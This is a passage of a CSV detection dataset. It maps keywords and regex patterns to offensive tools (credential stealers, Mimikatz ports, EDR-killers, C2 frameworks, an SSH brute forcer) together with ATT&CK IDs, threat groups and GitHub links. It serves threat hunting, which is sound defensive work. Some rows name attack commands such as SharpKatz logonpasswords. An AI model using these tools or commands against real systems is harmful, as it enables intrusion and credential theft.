"*ShareAudit.v3.0.0.exe*",".{0,1000}ShareAudit\.v3\.0\.0\.exe.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","1","N/A","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","58775"
"*ShareAudit.v3.0.1.exe*",".{0,1000}ShareAudit\.v3\.0\.1\.exe.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","1","N/A","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","58776"
"*ShareAudit.v3.0.2.exe*",".{0,1000}ShareAudit\.v3\.0\.2\.exe.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","1","N/A","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","58777"
"*ShareAudit-master.zip*",".{0,1000}ShareAudit\-master\.zip.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","1","N/A","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","58778"
"*shareenum.py*",".{0,1000}shareenum\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","58779"
"*shareenumeration*",".{0,1000}shareenumeration.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","58780"
"*SharepointExploiter.ps1*",".{0,1000}SharepointExploiter\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","58781"
"*SharepointSiteExploiter.ps1*",".{0,1000}SharepointSiteExploiter\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","58782"
"*Shares/cme_spider_plus*",".{0,1000}Shares\/cme_spider_plus.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","58783"
"*Shares/finduncshar_*.txt*",".{0,1000}Shares\/finduncshar_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","58784"
"*--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items*decrypted_cookie*",".{0,1000}\-\-Sharing\-this\-will\-allow\-someone\-to\-log\-in\-as\-you\-and\-to\-steal\-your\-ROBUX\-and\-items.{0,1000}decrypted_cookie.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","58785"
"*sharp ADCollector*",".{0,1000}sharp\sADCollector.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58787"
"*sharp ADSearch*",".{0,1000}sharp\sADSearch.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58788"
"*sharp BetterSafetyKatz*",".{0,1000}sharp\sBetterSafetyKatz.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58789"
"*sharp init  download/update SharpCollection tools*",".{0,1000}sharp\sinit\s\sdownload\/update\sSharpCollection\stools.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58790"
"*sharp InveighZero*",".{0,1000}sharp\sInveighZero.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58791"
"*sharp SharpAllowedToAct*",".{0,1000}sharp\sSharpAllowedToAct.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58792"
"*sharp SharpAppLocker*",".{0,1000}sharp\sSharpAppLocker.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58793"
"*sharp SharpChisel*",".{0,1000}sharp\sSharpChisel.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58794"
"*sharp SharpChromium*",".{0,1000}sharp\sSharpChromium.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58795"
"*sharp SharpCrashEventLog *",".{0,1000}sharp\sSharpCrashEventLog\s.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58796"
"*sharp SharpKatz --Command logonpasswords*",".{0,1000}sharp\sSharpKatz\s\-\-Command\slogonpasswords.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58797"
"*sharp SharpMiniDump*",".{0,1000}sharp\sSharpMiniDump.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58798"
"*sharp Sharp-SMBExec *",".{0,1000}sharp\sSharp\-SMBExec\s.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","APT29","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58799"
"*sharp SharpSpray*",".{0,1000}sharp\sSharpSpray.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58800"
"*sharp SharpZeroLogon*",".{0,1000}sharp\sSharpZeroLogon.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58801"
"*sharp StickyNotesExtract*",".{0,1000}sharp\sStickyNotesExtract.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58802"
"*sharp winPEAS*",".{0,1000}sharp\swinPEAS.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58803"
"*sharp_collection.insert(*",".{0,1000}sharp_collection\.insert\(.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","58804"
"*Sharp_v4_x64*.bin*",".{0,1000}Sharp_v4_x64.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","58805"
"*Sharp_v4_x86*.bin*",".{0,1000}Sharp_v4_x86.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","58806"
"*sharpadidnsdump.*",".{0,1000}sharpadidnsdump\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","58807"
"*SharpAdidnsdumpManager*",".{0,1000}SharpAdidnsdumpManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","58808"
"*SharpAdidnsdumpMenu*",".{0,1000}SharpAdidnsdumpMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","58809"
"*SharpADWS 1.0.0-beta - Copyright*",".{0,1000}SharpADWS\s1\.0\.0\-beta\s\-\sCopyright.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","58810"
"*SharpADWS.exe*",".{0,1000}SharpADWS\.exe.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","1","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","58811"
"*SharpAllowedToAct.exe*",".{0,1000}SharpAllowedToAct\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58812"
"*SharpAltSecIds add*",".{0,1000}SharpAltSecIds\sadd.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","0","N/A","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","58813"
"*SharpAltSecIds by @bugch3ck*",".{0,1000}SharpAltSecIds\sby\s\@bugch3ck.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","0","#content","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","58814"
"*SharpAltSecIds command*",".{0,1000}SharpAltSecIds\scommand.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","0","N/A","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","58815"
"*SharpAltSecIds l /target:*",".{0,1000}SharpAltSecIds\sl\s\/target\:.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","0","N/A","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","58816"
"*SharpAltSecIds list*",".{0,1000}SharpAltSecIds\slist.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","0","N/A","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","58817"
"*SharpAltSecIds r /target:*",".{0,1000}SharpAltSecIds\sr\s\/target\:.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","0","N/A","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","58818"
"*SharpAltSecIds remove*",".{0,1000}SharpAltSecIds\sremove.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","0","N/A","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","58819"
"*sharpapplocker*",".{0,1000}sharpapplocker.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","58820"
"*SharpAppLocker.exe*",".{0,1000}SharpAppLocker\.exe.{0,1000}","offensive_tool_keyword","SharpAppLocker","Useful when you already bypassed AppLocker initially and you don't want to leave PS logs","T1086 - T1569.002 - T1070.003","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpAppLocker","1","1","N/A","N/A","7","1","99","16","2022-12-08T11:06:40Z","2020-08-01T12:58:36Z","58821"
"*SharpAppLocker.exe*",".{0,1000}SharpAppLocker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58822"
"*SharpAVKB.Cmd*",".{0,1000}SharpAVKB\.Cmd.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","0","N/A","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","58823"
"*SharpAVKB.exe -AV*",".{0,1000}SharpAVKB\.exe\s\-AV.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","0","N/A","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","58824"
"*SharpAzbelt-main*",".{0,1000}SharpAzbelt\-main.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery","https://github.com/redskal/SharpAzbelt","1","1","N/A","N/A","8","1","26","7","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z","58825"
"*SharpBlackout* -p *",".{0,1000}SharpBlackout.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","0","N/A","N/A","10","1","83","20","2025-03-21T16:33:42Z","2023-08-23T14:16:40Z","58826"
"*SharpBlackOut.csproj*",".{0,1000}SharpBlackOut\.csproj.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","N/A","10","1","83","20","2025-03-21T16:33:42Z","2023-08-23T14:16:40Z","58827"
"*SharpBlackout.exe*",".{0,1000}SharpBlackout\.exe.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","N/A","10","1","83","20","2025-03-21T16:33:42Z","2023-08-23T14:16:40Z","58828"
"*SharpBlackOut.pdb*",".{0,1000}SharpBlackOut\.pdb.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","N/A","10","1","83","20","2025-03-21T16:33:42Z","2023-08-23T14:16:40Z","58829"
"*SharpBlackOut.sln*",".{0,1000}SharpBlackOut\.sln.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","N/A","10","1","83","20","2025-03-21T16:33:42Z","2023-08-23T14:16:40Z","58830"
"*SharpBlackout-main*",".{0,1000}SharpBlackout\-main.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","N/A","10","1","83","20","2025-03-21T16:33:42Z","2023-08-23T14:16:40Z","58831"
"*SharpBlock -*",".{0,1000}SharpBlock\s\-.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","N/A","10","10","1140","160","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z","58832"
"*SharpBlock.csproj*",".{0,1000}SharpBlock\.csproj.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","1","N/A","N/A","10","10","1140","160","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z","58833"
"*SharpBlock.exe*",".{0,1000}SharpBlock\.exe.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","1","N/A","N/A","10","10","1140","160","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z","58834"
"*SharpBlock.sln*",".{0,1000}SharpBlock\.sln.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","1","N/A","N/A","10","10","1140","160","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z","58835"
"*SharpBruteForceSSH.cs*",".{0,1000}SharpBruteForceSSH\.cs.{0,1000}","offensive_tool_keyword","SharpBruteForceSSH","simple SSH brute force tool ","T1110.003 - T1078","TA0006 ","N/A","N/A","Credential Access","https://github.com/HernanRodriguez1/SharpBruteForceSSH","1","1","N/A","N/A","9","1","60","10","2024-04-28T17:56:33Z","2024-04-25T20:06:05Z","58836"
"*SharpBruteForceSSH.exe*",".{0,1000}SharpBruteForceSSH\.exe.{0,1000}","offensive_tool_keyword","SharpBruteForceSSH","simple SSH brute force tool ","T1110.003 - T1078","TA0006 ","N/A","N/A","Credential Access","https://github.com/HernanRodriguez1/SharpBruteForceSSH","1","1","N/A","N/A","9","1","60","10","2024-04-28T17:56:33Z","2024-04-25T20:06:05Z","58837"
